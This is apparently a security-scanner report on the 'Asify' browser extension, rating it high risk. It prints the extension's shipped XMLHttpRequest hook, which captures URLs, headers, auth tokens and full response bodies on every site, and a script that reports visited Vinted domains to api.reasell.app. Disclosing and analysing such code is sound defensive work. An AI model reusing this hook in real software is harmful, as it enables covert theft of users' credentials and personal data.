Is ASIFY safe?
Asify is high risk. DA confirmed this extension injects a script into every site you visit, intercepting all XHR calls: URL, method, headers, response body, forwarded via CustomEvent. Interception runs on every site, not just the advertised platforms.…
Who publishes itNicolas ROSE - no other listings under this identity, 9 shared hostnames
Nicolas ROSE - no other listings under this identity, 9 shared hostnames
What this publisher told the store about itself, and the other listings that told it the same thing.
Shared hosts - 9 hostnames
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
XHR Hook Intercepts All Site Traffic on Every Page
DA confirmed this extension injects a script into every site you visit, intercepting all XHR calls: URL, method, headers, response body, forwarded via CustomEvent.
Interception runs on every site, not just the advertised platforms.
You visit any website while the extension is active.
This includes banking sites, email providers, and any other site making XHR calls.
The extension patches the page's XMLHttpRequest prototype to intercept all network requests.
Every XHR response, including URL, method, request headers, and full response body, is captured and dispatched as a CustomEvent inside the page.
XHR hook, shipped code (ma_injtd.js)
! function(e) {
var t = XMLHttpRequest.prototype,
s = t.open,
r = t.send,
i = t.setRequestHeader;
// Capture URL and method on .open()
t.open = function(e, t) {
return this._method = e, this._url = t, this._requestHeaders = {}, this._startTime = new Date().toISOString(), s.apply(this, arguments)
};
// Capture request headers on .setRequestHeader()
t.setRequestHeader = function(e, t) {
return this._requestHeaders[e] = t, i.apply(this, arguments)
};
// On .send(), attach load listener to capture response
t.send = function(e) {
return this.addEventListener("load", function() {
if (this._url) {
var e = this.getAllResponseHeaders();
try {
if ("blob" != this.responseType && this.responseText) {
// Build payload with all captured data and dispatch as CustomEvent
var t = {
url: this._url,
method: this._method,
origin: window.location.href,
requestHeaders: this._requestHeaders,
responseHeaders: e,
body: this.responseText // <-- full response body captured
};
window.dispatchEvent(new CustomEvent("XHR_HOOK", { detail: t }))
}
} catch (r) {}
}
}), r.apply(this, arguments)
}
}(XMLHttpRequest);| Field | Value | Why it matters | |
|---|---|---|---|
Request URL | https://mail.google.com/sync/u/0/i/s?hl=en&c=53 | The full URL of every network request made by the page, including API calls to banking, email, or other services. | |
HTTP Method | POST | Whether the request was a GET, POST, or other type, indicating whether data was being sent. | |
Request Headers | {"Authorization": "Bearer ya29.a0ARrd...", "Content-Type": "application/json"} | All request headers, which may include session tokens, authentication credentials, and content-type information. | |
Full Response Body | {"email":"user@example.com","name":"Jane Smith","account_id":"1048291"} | The complete text of every response from the server, which may include personal data, account information, or API tokens. | |
Page Origin | https://www.amazon.com/gp/cart/view.html | The URL of the page where each request was made, linking the request to a browsing context. |
- token.asify.app
Receives encoded tokens assembled from XHR responses on Facebook and Pinterest. Operated by the extension developer (asify.tools).
Vinted Domain Reported to Third-Party Server on Every Visit
DA confirmed that visiting any of 23 Vinted country sites (vinted.fr, vinted.de, vinted.co.uk, others) makes this extension send that site's hostname to a third-party server at api.reasell.app, undisclosed in the store listing.
You visit any Vinted country website (e.g. vinted.fr, vinted.de, vinted.co.uk).
The extension covers 23 European and global Vinted domains.
The extension sends the domain name of the Vinted site you visited to api.reasell.app.
This POST fires immediately on page load, before any user interaction with the Vinted site.
| Content-Type | application/json |
{
"domain": "www.vinted.fr"
}Vinted domain reporter, js/vt.js
(() => {
// Hardcoded list of 23 Vinted country domains
const vintedDomains = [
"https://www.vinted.at/", "https://www.vinted.be/", "https://www.vinted.cz/",
"https://www.vinted.de/", "https://www.vinted.dk/", "https://www.vinted.es/",
"https://www.vinted.fi/", "https://www.vinted.fr/", "https://www.vinted.gr/",
"https://www.vinted.hr/", "https://www.vinted.hu/", "https://www.vinted.ie/",
"https://www.vinted.it/", "https://www.vinted.lt/", "https://www.vinted.lu/",
"https://www.vinted.nl/", "https://www.vinted.pl/", "https://www.vinted.pt/",
"https://www.vinted.ro/", "https://www.vinted.se/", "https://www.vinted.sk/",
"https://www.vinted.co.uk/", "https://www.vinted.com/"
];
const currentUrl = window.location.href;
// Check if the current page is one of the Vinted domains
if (vintedDomains.some(domain => currentUrl.startsWith(domain))) {
const hostname = new URL(window.location.href).hostname; // e.g. "www.vinted.fr"
// Report the domain to a third-party server
axios.post("https://api.reasell.app/tokens/auth", {
domain: hostname
}).then(() => {}).catch(() => {})
}
})();- api.reasell.app
Receives the Vinted country domain on each visit. reasell.app is a separate product from asify.tools, the extension's primary operator domain.
What it can do
Permissions this extension asks for, as declared in version 11.0.0.13. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Read and change your data on every secure site you visit
https://*/*
Store data in your browser
storage